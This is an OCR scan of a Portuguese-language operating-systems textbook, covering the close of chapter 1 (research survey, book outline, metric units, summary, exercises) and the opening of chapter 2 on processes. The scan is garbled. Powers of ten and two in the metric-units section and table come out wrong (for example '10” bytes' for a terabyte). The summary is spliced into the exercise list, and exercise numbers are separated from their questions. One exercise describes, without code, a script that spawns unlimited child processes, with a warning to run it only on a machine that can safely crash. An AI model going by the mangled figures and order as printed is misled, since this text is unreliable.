quisa industrial estão constantemente pensando em no- 
vas ideias, algumas das quais não vão a parte alguma, 
mas outras tornam-se a pedra fundamental de produtos 
futuros e têm um impacto enorme sobre a indústria e 
usuários. Diferenciar umas das outras é mais fácil de- 
pois do momento em que são lançadas. Separar o joio 
do trigo é especialmente difícil, pois muitas vezes são 
necessários de 20 a 30 anos para uma ideia causar um 
impacto. 

Por exemplo, quando o presidente Eisenhower criou a 
ARPA (Advanced Research Projects Agency — Agência 
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de Projetos de Pesquisa Avançada) do Departamento de 
Defesa em 1958, ele estava tentando evitar que o Exérci- 
to tomasse conta do orçamento de pesquisa do Pentágo- 
no, deixando de fora a Marinha e a Força Aérea. Ele não 
estava tentando inventar a internet. Mas uma das coisas 
que a ARPA fez foi financiar alguma pesquisa univer- 
sitária sobre o então obscuro conceito de comutação de 
pacotes, que levou à primeira rede de comutação de pa- 
cotes, a ARPANET. Ela foi criada em 1969. Não levou 
muito tempo e outras redes de pesquisa financiadas pela 
ARPA estavam conectadas à ARPANET, e a internet foi 
criada. A internet foi então usada alegremente pelos pes- 
quisadores acadêmicos para enviar e-mails uns para os 
outros por 20 anos. No início da década de 1990, Tim 
Berners-Lee inventou a World Wide Web no laborató- 
rio de pesquisa CERN em Genebra e Marc Andreessen 
criou um navegador gráfico para ela na Universidade de 
Illinois. De uma hora para outra a internet estava cheia 
de adolescentes batendo papo. O presidente Eisenhower 
está provavelmente rolando em sua sepultura. 

A pesquisa em sistemas operacionais também levou 
a mudanças dramáticas em sistemas práticos. Como 
discutimos antes, os primeiros sistemas de computa- 
dores comerciais eram todos em lote, até que o M.LT. 
inventou o tempo compartilhado interativo no início da 
década de 1960. Computadores eram todos baseados 
em texto até que Doug Engelbart inventou o mouse e a 
interface gráfica com o usuário no Instituto de Pesquisa 
Stanford no fim da década de 1960. Quem sabe o que 
virá por aí? 

Nesta seção e em seções comparáveis neste livro, 
examinaremos brevemente algumas das pesquisas que 
foram feitas sobre sistemas operacionais nos últimos 
cinco a dez anos, apenas para dar um gosto do que pode 
vir pela frente. Esta introdução certamente não é abran- 
gente. Ela é baseada em grande parte nos estudos que 
foram publicados nas principais conferências de pes- 
quisa, pois essas ideias pelo menos passaram por um 
processo rigoroso de análise de seus pares a fim de se- 
rem publicados. Observe que na ciência de computação 
— em comparação com outros campos científicos — a 
maior parte da pesquisa é publicada em conferências, 
não em periódicos. A maioria dos estudos citados nas 
seções de pesquisa foi publicada pela ACM, a IEEE 
Computer Society ou USENIX, e estão disponíveis na 
internet para membros (estudantes) dessas organiza- 
ções. Para mais informações sobre essas organizações e 
suas bibliotecas digitais, ver 


ACM http://www.acm.org 
IEEE Computer Society http :/Awww.computer.org 
USENIX http:/Awww.usenix.org 


Virtualmente todos os pesquisadores de sistemas 
operacionais sabem que os sistemas operacionais atu- 
ais são enormes, inflexiveis, inconfiáveis, inseguros e 
carregados de erros, uns mais que os outros (os nomes 
não são citados aqui para proteger os culpados). Con- 
sequentemente, há muita pesquisa sobre como cons- 
truir sistemas operacionais melhores. Trabalhos foram 
publicados recentemente sobre erros em códigos e sua 
correção (RENZELMANN et al., 2012; e ZHOU et al., 
2012), recuperação de travamentos (CORREIA et al., 
2012; MA et al., 2013; ONGARO et al., 2011; e YEH e 
CHENG, 2012), gerenciamento de energia (PATHAK 
et al., 2012; PETRUCCI e LOQUES, 2012; e SHEN et 
al., 2013), sistemas de armazenamento e de arquivos 
(ELNABLY e WANG, 2012; NIGHTINGALE et al., 
2012; e ZHANG et al., 2013a), E/S de alto desempe- 
nho (De BRUIJN et al., 2011; LI et al., 2013a; e RIZ- 
ZO, 2012), hiper-threading e multi-threading (LIU et 
al., 2011), atualização ao vivo (GIUFFRIDA et al., 
2013), gerenciando GPUs (ROSSBACH et al., 2011), 
gerenciamento de memória (JANTZ et al., 2013; e JE- 
ONG et al., 2013), sistemas operacionais com múlti- 
plos núcleos (BAUMANN et al., 2009; KAPRITSOS, 
2012; LACHAIZE et al., 2012; e WENTZLAFF et al., 
2012), corretude de sistemas operacionais (ELPHINS- 
TONE et al., 2007; YANG et al., 2006; e KLEIN et 
al., 2009), confiabilidade de sistemas operacionais 
(HRUBY et al., 2012; RYZHYK et al., 2009, 2011 e 
ZHENG etal., 2012), privacidade e segurança (DUNN 
et al., 2012; GIUFFRIDA et al., 2012; LI et al., 2013b; 
LORCH et al., 2013; ORTOLANI e CRISPO, 2012; 
SLOWINSKA et al., 2012; e UR et al., 2012), uso 
e monitoramento de desempenho (HARTER et al., 
2012; e RAVINDRANATH et al., 2012), e virtuali- 
zação (AGESEN et al., 2012; BEN-YEHUDA et al., 
2010; COLP et al., 2011; DAT et al., 2013; TARASOV 
et al., 2013; e WILLIAMS et al., 2012) entre muitos 
outros tópicos. 


1.10 Delineamento do resto deste livro 


Agora completamos a nossa introdução e visão pa- 
norâmica do sistema operacional. É chegada a hora de 
entrarmos nos detalhes. Como já mencionado, do ponto 
de vista do programador, a principal finalidade de um 
sistema operacional é fornecer algumas abstrações fun- 
damentais, das quais as mais importantes são os pro- 
cessos e threads, espaços de endereçamento e arquivos. 
Portanto, os próximos três capítulos são devotados a 
esses tópicos críticos. 


O Capítulo 2 trata de processos e threads. Ele 
discute as suas propriedades e como eles se comuni- 
cam uns com os outros. Ele também dá uma série de 
exemplos detalhados de como a comunicação entre 
processos funciona e como evitar algumas de suas 
armadilhas. 

No Capítulo 3, estudaremos detalhadamente os es- 
paços de endereçamento e seu complemento e o geren- 
ciamento de memória. O tópico importante da memória 
virtual será examinado, juntamente com conceitos proxi- 
mamente relacionados, como a paginação e segmentação. 

Então, no Capítulo 4, chegaremos ao tópico tão im- 
portante dos sistemas de arquivos. Em grande parte, o 
que o usuário mais vê é o sistema de arquivos. Exa- 
minaremos tanto a interface como a implementação de 
sistemas de arquivos. 

A Entrada/Saída é coberta no Capítulo 5. Os con- 
ceitos de independência e dependência de dispositivos 
serão examinados. Vários dispositivos importantes, 
incluindo discos, teclados e monitores, serão usados 
como exemplos. 

O Capítulo 6 aborda os impasses. Mostramos bre- 
vemente o que são os impasses neste capítulo, mas há 
muito mais para se dizer a respeito deles. São discutidas 
maneiras de prevenir e evitá-los. 

A essa altura teremos completado nosso estudo dos 
princípios básicos de sistemas operacionais de uma úni- 
ca CPU. No entanto, há mais a ser dito, em especial 
sobre tópicos avançados. No Capítulo 7, examinare- 
mos a virtualização. Discutiremos em detalhes tanto os 
princípios quanto algumas das soluções de virtualização 
existentes. Tendo em vista que a virtualização é inten- 
samente usada na computação na nuvem, também ob- 
servaremos os sistemas de nuvem que há por aí. Outro 
tópico avançado diz respeito aos sistemas de multipro- 
cessadores, incluindo múltiplos núcleos, computadores 
paralelos e sistemas distribuídos. Esses assuntos são co- 
bertos no Capítulo 8. 


(FIGURA 1.31) Os principais prefixos métricos. 
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Um assunto importantíssimo é o da segurança de sis- 
temas operacionais, que é coberto no Capítulo 9. Entre 
os tópicos discutidos nesse capítulo está o das ameaças 
(por exemplo, vírus e vermes), mecanismos de proteção 
e modelos de segurança. 

Em seguida temos alguns estudos de caso de siste- 
mas operacionais reais. São eles: UNIX, Linux e An- 
droid (Capítulo 10) e Windows 8 (Capítulo 11). O texto 
conclui com alguma sensatez e reflexões sobre projetos 
de sistemas operacionais no Capítulo 12. 


1.11 Unidades métricas 


Para evitar qualquer confusão, vale a pena declarar 
explicitamente que neste livro, como na ciência de com- 
putação em geral, as unidades métricas são usadas em 
vez das unidades inglesas tradicionais (o sistema fur- 
long-stone-furlong). Os principais prefixos métricos são 
listados na Figura 1.31. Os prefixos são abreviados por 
suas primeiras letras, com as unidades maiores que 1 em 
letras maiúsculas. Desse modo, um banco de dados de 1 
TB ocupa 10” bytes de memória e um tique de relógio 
de 100 pseg (ou 100 ps) ocorre a cada 101º. Tendo em 
vista que tanto mili quanto micro começam com a letra 
“m”, uma escolha tinha de ser feita. Normalmente, “m” 
é para mili e “pv” (a letra grega mu) é para micro. 

Também vale a pena destacar que, em comum com a 
prática da indústria, as unidades para mensurar tamanhos 
da memória têm significados ligeiramente diferentes. O 
quilo corresponde a 2'° (1.024) em vez de 10º (1.000), 
pois as memórias são sempre expressas em potências de 
dois. Desse modo, uma memória de 1 KB contém 1.024 
bytes, não 1.000 bytes. Similarmente, uma memória de 
1 MB contém 2” (1.048.576) bytes e uma memória de 
1 GB contém 2% (1.073.741.824) bytes. No entanto, 
uma linha de comunicação de 1 Kbps transmite 1.000 
bits por segundo e uma LAN de 10 Mbps transmite a 






































Exp. Explícito Prefixo Exp. Explícito Prefixo 
10% 0,001 mili 10º 1.000 quilo 
108 0,000001 micro 108 1.000.000 mega 
10° 0,000000001 nano 10° 1.000.000.000 giga 
10712 0,000000000001 pico 1012 1.000.000.000.000 tera 
10718 0,000000000000001 femto 107° 1.000.000.000.000.000 peta 
10-8 0,000000000000000001 atto 1078 1.000.000.000.000.000.000 exa 
102 0,000000000000000000001 zepto 102! 1.000.000.000.000.000.000.000 zetta 
10 0,000000000000000000000001 yocto 10% 1.000.000.000.000.000.000.000.000 yotta 
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10.000.000 bits/s, pois essas velocidades nao sao po- 
téncias de dois. Infelizmente, muitas pessoas tendem a 
misturar os dois sistemas, em especial para tamanhos de 
discos. Para evitar ambiguidade, usaremos neste livro 


1.12 Resumo 


Sistemas operacionais podem ser vistos de dois pon- 
tos de vista: como gerenciadores de recursos e como 
máquinas estendidas. Como gerenciador de recursos, o 
trabalho do sistema operacional é gerenciar as diferen- 
tes partes do sistema de maneira eficiente. Como má- 
quina estendida, o trabalho do sistema é proporcionar 
aos usuários abstrações que sejam mais convenientes 
para usar do que a máquina real. Essas incluem proces- 
sos, espaços de endereçamento e arquivos. 

Sistemas operacionais têm uma longa história, co- 
meçando nos dias quando substituiam o operador, até 
os sistemas de multiprogramação modernos. Destaques 
incluem os primeiros sistemas em lote, sistemas de mul- 
tiprogramação e sistemas de computadores pessoais. 

Como os sistemas operacionais interagem intima- 
mente com o hardware, algum conhecimento sobre o 
hardware de computadores é útil para entendê-los. Os 
computadores são constituídos de processadores, me- 
mórias e dispositivos de E/S. Essas partes são conecta- 
das por barramentos. 


PROBLEMAS 


1. Quais são as duas principais funções de um sistema 
operacional? 

2. Na Seção 1.4, nove tipos diferentes de sistemas opera- 
cionais são descritos. Dê uma lista das aplicações para 
cada um desses sistemas (uma para cada tipo de sistema 
operacional). 

3. Qual é a diferença entre sistemas de compartilhamento 
de tempo e de multiprogramação? 

4. Para usar a memória de cache, a memória principal é di- 
vidida em linhas de cache, em geral de 32 a 64 bytes de 
comprimento. Uma linha inteira é capturada em cache 
de uma só vez. Qual é a vantagem de fazer isso com uma 
linha inteira em vez de um único byte ou palavra de cada 
vez? 

5. Nos primeiros computadores, cada byte de dados lido ou 
escrito era executado pela CPU (isto é, não havia DMA). 
Quais implicações isso tem para a multiprogramação? 

6. Instruções relacionadas ao acesso a dispositivos de E/S 
são tipicamente instruções privilegiadas, isto é, podem 


os símbolos KB, MB e GB para 2!º, 27° e 2% bytes res- 
pectivamente, e os símbolos Kbps, Mbps e Gbps para 
103, 10° e 10º bits/s, respectivamente. 


Os conceitos básicos sobre os quais todos os siste- 
mas operacionais são construídos são os processos, o 
gerenciamento de memória, o gerenciamento de E/S, o 
sistema de arquivos e a segurança. Cada um deles será 
tratado em um capítulo subsequente. 

O coração de qualquer sistema operacional é o con- 
junto de chamadas de sistema com que ele consegue li- 
dar. Essas chamadas dizem o que o sistema operacional 
realmente faz. Para UNIX, examinamos quatro grupos 
de chamadas de sistema. O primeiro grupo diz respei- 
to à criação e ao término de processos. O segundo é 
para a leitura e escrita de arquivos. O terceiro é para 
o gerenciamento de diretórios. O quarto grupo contém 
chamadas diversas. 

Sistemas operacionais podem ser estruturados de 
várias maneiras. As mais comuns são o sistema monoli- 
tico, a hierarquia de camadas, o micronúcleo, o cliente- 
-servidor, a máquina virtual e o exonúcleo. 


ser executadas em modo núcleo, mas não em modo 
usuário. Dê uma razão de por que essas instruções são 
privilegiadas. 

7. A ideia de família de computadores foi introduzida na 
década de 1960 com os computadores de grande porte 
System/360 da IBM. Essa ideia está ultrapassada ou ain- 
da é válida? 

8. Umarazão para a adoção inicialmente lenta das GUIs era 
o custo do hardware necessário para dar suporte a elas. 
Quanta RAM de vídeo é necessária para dar suporte a 
uma tela de texto monocromo de 25 linhas X 80 colu- 
nas de caracteres? E para um bitmap colorido de 24 bits 
de 1.200 X 900 pixels? Qual era o custo desta RAM em 
preços de 1980 (US$ 5/KB)? Quanto é agora? 

9. Há várias metas de projeto na construção de um sistema 
operacional, por exemplo, utilização de recursos, opor- 
tunidade, robustez e assim por diante. Dê um exemplo 
de duas metas de projeto que podem contradizer uma à 
outra. 


10. 


11. 


12. 


13. 


14. 


15. 


16. 


17. 


18. 


Qual é a diferença entre modo núcleo e modo usuário? 
Explique como ter dois modos distintos ajuda no projeto 
de um sistema operacional. 

Um disco de 255 GB tem 65.536 cilindros com 255 
setores por faixa e 512 bytes por setor. Quantos pratos 
e cabeças esse disco tem? Presumindo um tempo de 
busca de cilindro médio de 11 ms, atraso rotacional 
médio de 7 ms e taxa de leitura de 100 MB/s, calcule 
o tempo médio que será necessário para ler 400 KB de 
um setor. 

Quais das instruções a seguir devem ser deixadas so- 
mente em modo núcleo? 

(a) Desabilitar todas as interrupções. 

(b) Ler o relógio da hora do dia. 

(c) Configurar o relógio da hora do dia. 

(d) Mudar o mapa de memória. 

Considere um sistema que tem duas CPUs, cada uma 
tendo duas threads (hiper-threading). Suponha que três 
programas, P0, P/ e P2, sejam iniciados com tempos 
de execução de 5, 10 e 20 ms, respectivamente. Quanto 
tempo levará para completar a execução desses progra- 
mas? Presuma que todos os três programas sejam 100% 
ligados à CPU, não bloqueiem durante a execução e não 
mudem de CPUs uma vez escolhidos. 

Um computador tem um pipeline com quatro estágios. 
Cada estágio leva um tempo para fazer seu trabalho, a 
saber, | ns. Quantas instruções por segundo essa maqui- 
na consegue executar? 

Considere um sistema de computador que tem uma me- 
mória de cache, memória principal (RAM) e disco, e um 
sistema operacional que usa memória virtual. É necessá- 
rio 1 ns para acessar uma palavra da cache, 10 ns para 
acessar uma palavra da RAM e 10 ms para acessar uma 
palavra do disco. Se o índice de acerto da cache é 95% 
e o indice de acerto da memória principal (após um erro 
de cache) 99%, qual é o tempo médio para acessar uma 
palavra? 

Quando um programa de usuário faz uma chamada de 
sistema para ler ou escrever um arquivo de disco, ele 
fornece uma indicação de qual arquivo ele quer, um pon- 
teiro para o buffer de dados e o contador. O controle é 
então transferido para o sistema operacional, que chama 
o driver apropriado. Suponha que o driver começa o dis- 
co e termina quando ocorre uma interrupção. No caso 
da leitura do disco, obviamente quem chamou terá de 
ser bloqueado (pois não há dados para ele). E quanto a 
escrever para o disco? Quem chamou precisa ser bloque- 
ado esperando o término da transferência de disco? 

O que é uma instrução? Explique o uso em sistemas 
operacionais. 

Por que a tabela de processos é necessária em um sis- 
tema de compartilhamento de tempo? Ela também é 
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necessária em sistemas de computadores pessoais exe- 
cutando UNIX ou Windows com um único usuário? 
Existe alguma razão para que você quisesse montar um 
sistema de arquivos em um diretório não vazio? Se a 
resposta for sim, por quê? 

Para cada uma das chamadas de sistema a seguir, dê uma 
condição que a faça falhar: fork, exec e unlink. 

Qual tipo de multiplexação (tempo, espaço ou ambos) 
pode ser usado para compartilhar os seguintes recursos: 
CPU, memória, disco, placa de rede, impressora, teclado 
e monitor? 

A chamada 


count = write(fd, buffer, nbytes); 


pode retornar qualquer valor em count fora nbytes? Se a 
resposta for sim, por quê? 

Um arquivo cujo descritor é fd contém a sequência de 
bytes: 3, 1, 4, 1, 5, 9, 2, 6, 5, 3, 5. As chamadas de siste- 
ma a seguir sao feitas: 


Iseek(fd, 3, SEEK SET); 
read(fd, &buffer, 4); 


onde a chamada Iseek faz uma busca para o byte 3 do 
arquivo. O que o buffer contém após a leitura ter sido 
feita? 

Suponha que um arquivo de 10 MB esteja armazenado 
em um disco na mesma faixa (faixa 50) em setores conse- 
cutivos. O braço do disco está atualmente situado sobre o 
número da faixa 100. Quanto tempo ele levará para retirar 
esse arquivo do disco? Presuma que ele leve em torno de 
1 ms para mover o braço de um cilindro para o próximo 
e em torno de 5 ms para o setor onde o início do arquivo 
está armazenado para girar sob a cabeça. Também, presu- 
ma que a leitura ocorra a uma taxa de 200 MB/s. 

Qual é a diferença essencial entre um arquivo especial 
de bloco e um arquivo especial de caractere? 

No exemplo dado na Figura 1.17, a rotina de biblioteca é 
chamada read e a chamada de sistema em si é chamada 
read. É fundamental que ambas tenham o mesmo nome? 
Se não, qual é a mais importante? 

Sistemas operacionais modernos desacoplam o espaço 
de endereçamento do processo da memória física da má- 
quina. Liste duas vantagens desse projeto. 

Para um programador, uma chamada de sistema parece 
com qualquer outra chamada para uma rotina de biblio- 
teca. É importante que um programador saiba quais roti- 
nas de biblioteca resultam em chamadas de sistema? Em 
quais circunstâncias e por quê? 

A Figura 1.23 mostra que uma série de chamadas de sis- 
tema UNIX não possuem equivalentes na API Win32. 
Para cada uma das chamadas listadas como não tendo 
um equivalente Win32, quais são as consequências para 
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um programador de converter um programa UNIX para 
ser executado sob o Windows? 

Um sistema operacional portátil é um sistema que pode 
ser levado de uma arquitetura de sistema para outra sem 
nenhuma modificação. Explique por que é impraticável 
construir um sistema operacional que seja completa- 
mente portátil. Descreva duas camadas de alto nível que 
você terá ao projetar um sistema operacional que seja 
altamente portátil. 

Explique como a separação da política e mecanismo aju- 
da na construção de sistemas operacionais baseados em 
micronúcleos. 

Máquinas virtuais tornaram-se muito populares por uma 
série de razões. Não obstante, elas têm alguns proble- 
mas. Cite um. 

A seguir algumas questões para praticar conversões de 
unidades: 


(a) 
(b) 


Quantos segundos há em um nanoano? 
Micrômetros são muitas vezes chamados de mi- 
crons. Qual o comprimento de um megamicron? 
(c) Quantos bytes existem em uma memória de 1 PB? 
(d) A massa da Terra é 6.000 yottagramas. Quanto é 
isso em quilogramas? 

Escreva um shell que seja similar à Figura 1.19, mas 
contenha código suficiente para que ela realmente 
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funcione, de maneira que você possa testá-lo. Talvez 
você queira acrescentar alguns aspectos como o redi- 
recionamento de entrada e saída, pipes e tarefas de se- 
gundo plano. 

Se você tem um sistema tipo UNIX (Linux, MINIX 3, 
FreeBSD etc.) disponível que possa seguramente derru- 
bar e reinicializar, escreva um script de shell que tente 
criar um número ilimitado de processos filhos e observe 
o que acontece. Antes de realizar o experimento, digi- 
te sync para o shell para limpar os buffers de sistema 
de arquivos para disco para evitar arruinar o sistema de 
arquivos. Você também pode fazer o experimento segu- 
ramente em uma máquina virtual. 

Nota: não tente fazer isso em um sistema compartilhado 
sem antes conseguir a permissão do administrador do 
sistema. As consequências serão de imediato óbvias, en- 
tão é provável que você seja pego e sofra sanções. 
Examine e tente interpretar os conteúdos de um diretório 
tipo UNIX ou Windows com uma ferramenta como o 
programa UNIX od. (Dica: como você vai fazer isso de- 
pende do que o sistema operacional permitir. Um truque 
que pode funcionar é criar um diretório em um pen drive 
com um sistema operacional e então ler os dados brutos 
do dispositivo usando um sistema operacional diferente 
que permita esse acesso.) 


CAPÍTULO 


stamos prestes a embarcar agora em um estudo de- 

talhado de como os sistemas operacionais são pro- 

jetados e construídos. O conceito mais central em 

qualquer sistema operacional é o processo: uma 

abstração de um programa em execução. Tudo o 
mais depende desse conceito, e o projetista (e estudan- 
te) do sistema operacional deve ter uma compreensão 
profunda do que é um processo o mais cedo possível. 

Processos são uma das mais antigas e importantes 
abstrações que os sistemas operacionais proporcionam. 
Eles dão suporte à possibilidade de haver operações 
(pseudo) concorrentes mesmo quando há apenas uma 
CPU disponível, transformando uma única CPU em 
múltiplas CPUs virtuais. Sem a abstração de processo, 
a computação moderna não poderia existir. Neste capi- 
tulo, examinaremos detalhadamente os processos e seus 
“primos”, os threads. 


2.1 Processos 


Todos os computadores modernos frequentemente rea- 
lizam várias tarefas ao mesmo tempo. As pessoas acostu- 
madas a trabalhar com computadores talvez não estejam 
totalmente cientes desse fato, então alguns exemplos 
podem esclarecer este ponto. Primeiro, considere um 
servidor da web, em que solicitações de páginas da web 
chegam de toda parte. Quando uma solicitação chega, 
o servidor confere para ver se a página requisitada está 
em cache. Se estiver, ela é enviada de volta; se não, uma 
solicitação de acesso ao disco é iniciada para buscá-la. 
No entanto, do ponto de vista da CPU, as solicitações de 
acesso ao disco levam uma eternidade. Enquanto espera 
que uma solicitação de acesso ao disco seja concluída, 





muitas outras solicitações podem chegar. Se há múlti- 
plos discos presentes, algumas ou todas as solicitações 
mais recentes podem ser enviadas para os outros discos 
muito antes de a primeira solicitação ter sido concluída. 
Está claro que algum método é necessário para mode- 
lar e controlar essa concorrência. Processos (e especial- 
mente threads) podem ajudar nisso. 

Agora considere um PC de usuário. Quando o siste- 
ma é inicializado, muitos processos são secretamente 
iniciados, quase sempre desconhecidos para o usuá- 
rio. Por exemplo, um processo pode ser inicializado 
para esperar pela chegada de e-mails. Outro pode ser 
executado em prol do programa antivírus para conferir 
periodicamente se há novas definições de vírus dis- 
poníveis. Além disso, processos explícitos de usuários 
podem ser executados, imprimindo arquivos e salvan- 
do as fotos do usuário em um pen-drive, tudo isso en- 
quanto o usuário está navegando na Web. Toda essa 
atividade tem de ser gerenciada, e um sistema de mul- 
tiprogramação que dê suporte a múltiplos processos é 
muito útil nesse caso. 

Em qualquer sistema de multiprogramação, a CPU 
muda de um processo para outro rapidamente, execu- 
tando cada um por dezenas ou centenas de milissegun- 
dos. Enquanto, estritamente falando, em qualquer dado 
instante a CPU está executando apenas um processo, no 
curso de 1s ela pode trabalhar em vários deles, dando a 
ilusão do paralelismo. Às vezes, as pessoas falam em 
pseudoparalelismo neste contexto, para diferenciar do 
verdadeiro paralelismo de hardware dos sistemas mul- 
tiprocessadores (que têm duas ou mais CPUs compar- 
tilhando a mesma memória física). Ter controle sobre 
múltiplas atividades em paralelo é algo difícil para as 
pessoas realizarem. Portanto, projetistas de sistemas 
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operacionais através dos anos desenvolveram um mo- 
delo conceitual (processos sequenciais) que torna o 
paralelismo algo mais fácil de lidar. Esse modelo, seus 
usos e algumas das suas consequências compõem o as- 
sunto deste capítulo. 


2.1.1 O modelo de processo 


Nesse modelo, todos os softwares executáveis no 
computador, às vezes incluindo o sistema operacional, 
são organizados em uma série de processos sequen- 
ciais, ou, simplesmente, processos. Um processo é 
apenas uma instância de um programa em execução, 
incluindo os valores atuais do contador do programa, 
registradores e variáveis. Conceitualmente, cada pro- 
cesso tem sua própria CPU virtual. Na verdade, a CPU 
real troca a todo momento de processo em processo, 
mas, para compreender o sistema, é muito mais fácil 
pensar a respeito de uma coleção de processos sendo 
executados em (pseudo) paralelo do que tentar acom- 
panhar como a CPU troca de um programa para o ou- 
tro. Esse mecanismo de trocas rápidas é chamado de 
multiprogramação, como vimos no Capítulo 1. 

Na Figura 2.1(a) vemos um computador multipro- 
gramando quatro programas na memória. Na Figura 
2.1(b) vemos quatro processos, cada um com seu pró- 
prio fluxo de controle (isto é, seu próprio contador de 
programa lógico) e sendo executado independente dos 
outros. É claro que há apenas um contador de programa 
físico, de maneira que, quando cada processo é executa- 
do, o seu contador de programa lógico é carregado para 
o contador de programa real. No momento em que ele 
é concluído, o contador de programa físico é salvo no 
contador de programa lógico do processo na memória. 
Na Figura 2.1(c) vemos que, analisados durante um in- 
tervalo longo o suficiente, todos os processos tiveram 


progresso, mas a qualquer dado instante apenas um está 
sendo de fato executado. 

Neste capítulo, presumiremos que há apenas uma 
CPU. Cada vez mais, no entanto, essa suposição não é 
verdadeira, tendo em vista que os chips novos são mui- 
tas vezes multinucleos (multicore), com dois, quatro ou 
mais núcleos. Examinaremos os chips multinúcleos e 
multiprocessadores em geral no Capítulo 8, mas, por 
ora, é mais simples pensar em apenas uma CPU de cada 
vez. Então quando dizemos que uma CPU pode na rea- 
lidade executar apenas um processo de cada vez, se há 
dois núcleos (ou CPUs) cada um deles pode ser execu- 
tado apenas um processo de cada vez. 

Com o chaveamento rápido da CPU entre os pro- 
cessos, a taxa pela qual um processo realiza a sua 
computação não será uniforme e provavelmente nem 
reproduzível se os mesmos processos forem executa- 
dos outra vez. Desse modo, processos não devem ser 
programados com suposições predefinidas sobre a 
temporização. Considere, por exemplo, um processo 
de áudio que toca música para acompanhar um vídeo 
de alta qualidade executado por outro dispositivo. 
Como o áudio deve começar um pouco depois do que 
o vídeo, ele sinaliza ao servidor do vídeo para come- 
çar a execução, e então realiza um laço ocioso 10.000 
vezes antes de executar o áudio. Se o laço for um 
temporizador confiável, tudo vai correr bem, mas se a 
CPU decidir trocar para outro processo durante o laço 
ocioso, o processo de áudio pode não ser executado 
de novo até que os quadros de vídeo correspondentes 
ja tenham vindo e ido embora, e o vídeo e o áudio 
ficarão irritantemente fora de sincronia. Quando um 
processo tem exigências de tempo real, críticas como 
essa, isto é, eventos particulares, têm de ocorrer den- 
tro de um número específico de milissegundos e me- 
didas especiais precisam ser tomadas para assegurar 
que elas ocorram. Em geral, no entanto, a maioria 
dos processos não é afetada pela multiprogramação 
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subjacente da CPU ou as velocidades relativas de 
processos diferentes. 

A diferença entre um processo e um programa é su- 
til, mas absolutamente crucial. Uma analogia poderá 
ajudá-lo aqui: considere um cientista de computação 
que gosta de cozinhar e está preparando um bolo de ani- 
versário para sua filha mais nova. Ele tem uma receita 
de um bolo de aniversário e uma cozinha bem estocada 
com todas as provisões: farinha, ovos, açúcar, extrato 
de baunilha etc. Nessa analogia, a receita é o programa, 
isto é, o algoritmo expresso em uma notação adequada, 
o cientista de computação é o processador (CPU) e os 
ingredientes do bolo são os dados de entrada. O proces- 
so é a atividade consistindo na leitura da receita, busca 
de ingredientes e preparo do bolo por nosso cientista. 

Agora imagine que o filho do cientista de computa- 
ção aparece correndo chorando, dizendo que foi pica- 
do por uma abelha. O cientista de computação registra 
onde ele estava na receita (o estado do processo atual 
é salvo), pega um livro de primeiros socorros e come- 
ça a seguir as orientações. Aqui vemos o processador 
sendo trocado de um processo (preparo do bolo) para 
um processo mais prioritário (prestar cuidado médico), 
cada um tendo um programa diferente (receita versus 
livro de primeiros socorros). Quando a picada de abelha 
tiver sido cuidada, o cientista de computação volta para 
o seu bolo, continuando do ponto onde ele havia parado. 

A ideia fundamental aqui é que um processo é uma 
atividade de algum tipo. Ela tem um programa, uma 
entrada, uma saída e um estado. Um único processa- 
dor pode ser compartilhado entre vários processos, com 
algum algoritmo de escalonamento sendo usado para 
determinar quando parar o trabalho em um processo e 
servir outro. Em comparação, um programa é algo que 
pode ser armazenado em disco sem fazer nada. 

Vale a pena observar que se um programa está sendo 
executado duas vezes, é contado como dois processos. 
Por exemplo, muitas vezes é possível iniciar um pro- 
cessador de texto duas vezes ou imprimir dois arqui- 
vos ao mesmo tempo, se duas impressoras estiverem 
disponíveis. O fato de que dois processos em execução 
estão operando o mesmo programa não importa, eles 
são processos distintos. O sistema operacional pode ser 
capaz de compartilhar o código entre eles de maneira 
que apenas uma cópia esteja na memória, mas isso é um 
detalhe técnico que não muda a situação conceitual de 
dois processos sendo executados. 
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2.1.2 Criação de processos 


Sistemas operacionais precisam de alguma manei- 
ra para criar processos. Em sistemas muito simples, ou 
em sistemas projetados para executar apenas uma úni- 
ca aplicação (por exemplo, o controlador em um forno 
micro-ondas), pode ser possível ter todos os processos 
que serão em algum momento necessários quando o sis- 
tema for ligado. Em sistemas para fins gerais, no entan- 
to, alguma maneira é necessária para criar e terminar 
processos, na medida do necessário, durante a operação. 
Vamos examinar agora algumas das questões. 

Quatro eventos principais fazem com que os proces- 
sos sejam criados: 


1. Inicialização do sistema. 

2. Execução de uma chamada de sistema de criação 
de processo por um processo em execução. 

3. Solicitação de um usuário para criar um novo 
processo. 

4. Início de uma tarefa em lote. 


Quando um sistema operacional é inicializado, em 
geral uma série de processos é criada. Alguns desses 
processos são de primeiro plano, isto é, processos que 
interagem com usuários (humanos) e realizam trabalho 
para eles. Outros operam no segundo plano e não es- 
tão associados com usuários em particular, mas em vez 
disso têm alguma função específica. Por exemplo, um 
processo de segundo plano pode ser projetado para acei- 
tar e-mails, ficando inativo a maior parte do dia, mas 
subitamente entrando em ação quando chega um e-mail. 
Outro processo de segundo plano pode ser projetado 
para aceitar solicitações de páginas da web hospedadas 
naquela máquina, despertando quando uma solicitação 
chega para servir àquele pedido. Processos que ficam 
em segundo plano para lidar com algumas atividades, 
como e-mail, páginas da web, notícias, impressão e 
assim por diante, são chamados de daemons. Grandes 
sistemas comumente têm dúzias deles: no UNIX,' o 
programa ps pode ser usado para listar os processos em 
execução; no Windows, o gerenciador de tarefas pode 
ser usado. 

Além dos processos criados durante a inicialização 
do sistema, novos processos podem ser criados depois 
também. Muitas vezes, um processo em execução emiti- 
rá chamadas de sistema para criar um ou mais processos 
novos para ajudá-lo em seu trabalho. Criar processos 
novos é particularmente útil quando o trabalho a ser fei- 
to pode ser facilmente formulado em termos de vários 


Neste capítulo, o UNIX deve ser interpretado como incluindo quase todos os sistemas baseados em POSIX, incluindo Linux, FreeBSD, 


OS X, Solaris etc., e, até certo ponto, Android e iOS também. (N. A.) 
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processos relacionados, mas de outra forma interagindo 
de maneira independente. Por exemplo, se uma grande 
quantidade de dados está sendo buscada através de uma 
rede para processamento subsequente, pode ser conve- 
niente criar um processo para buscar os dados e colocá- 
-los em um local compartilhado de memória enquanto 
um segundo processo remove os itens de dados e os 
processa. Em um multiprocessador, permitir que cada 
processo execute em uma CPU diferente também pode 
fazer com que a tarefa seja realizada mais rápido. 

Em sistemas interativos, os usuários podem começar 
um programa digitando um comando ou clicando duas 
vezes sobre um ícone. Cada uma dessas ações inicia um 
novo processo e executa nele o programa selecionado. 
Em sistemas UNIX baseados em comandos que execu- 
tam X, o novo processo ocupa a janela na qual ele foi ini- 
